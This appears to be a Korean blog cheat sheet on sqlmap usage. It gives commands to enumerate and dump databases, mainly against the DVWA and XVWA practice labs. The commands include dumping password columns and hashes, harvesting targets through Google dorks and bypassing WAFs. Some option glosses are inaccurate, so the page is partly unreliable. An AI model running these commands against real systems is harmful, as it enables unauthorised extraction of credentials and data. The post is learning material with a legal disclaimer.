Code::Security/ETC

SQL MAP 사용법 정리

태군 코드 2021. 6. 17. 15:02
반응형

이 도구를 이용하여 허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위 입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다.

 

SQLMAP 사용법 정리

기본정보 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5

sqlmap.py -u "http://webhacking.kr/challenge/web/web-02/admin/index.php" -v 5

데이터베이스 이름 가져오는 명령
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -v 5 --dbms="MySQL" --os="Windows" --dbs

데이터베이스 테이블 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa --tables

데이터베이스 테이블의 컬럼 확인
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users --columns

Dump 명령어를 통한 정보 출력
sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/?id=1" -D dvwa -T users -C passowrd --dump


Google dork 결과를 대상 주소로 처리하기

sqlmap.py -g "inurl:\".php?id=1\"" -> 파라미터가 id=1 인값을 자동으로 찾는다

sqlmap.py -u "http://domain_IP/xvwa/vulnerabilities/sqli_blind/" --data="item=1&search=" --dbs


옵션 정보 확인

--data
HTTP 메소드중 Get 메소드가 아닌 POST 요청으로 전송할때 사용

sqlmap.py -u "http://domain_IP/vulnerabilities/sqli_blind/" --data="id=1" --dbs
sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" --dbs

HTTP User-Agent 헤더 변경

--banner
시스템 버전과 패치 정보 확인

--current-user
DB 관리 시스템의 사용자 정보 검색

--current-db
현재 연결된 DB 이름을 확인

--hostname
서버 호스트 이름을 검색

--users
사용자 목록을 출력

--passwords
암호 해시를 나열

--schema --batch --exclude-sysdbs
모든 데이터베이스의 테이블 을 출력

--count -D -T -C
항목수를 표시하기 위해 사용

-hpp
WAF/IPS/IDS 를 우회

--identify-waf
보안장비 사용자 인증

--mobile
User-Agent 헤더를 모바일로 사용

--offline
이전 세션 데이터 값을 사용 연결시도는 0이 됨

--sqlmap-shell
사용자 전환

 

sqlmap --cookie="" --random-agent --level=1 --rist=1 -u [URL] --sql-query="select passhash from users"

반응형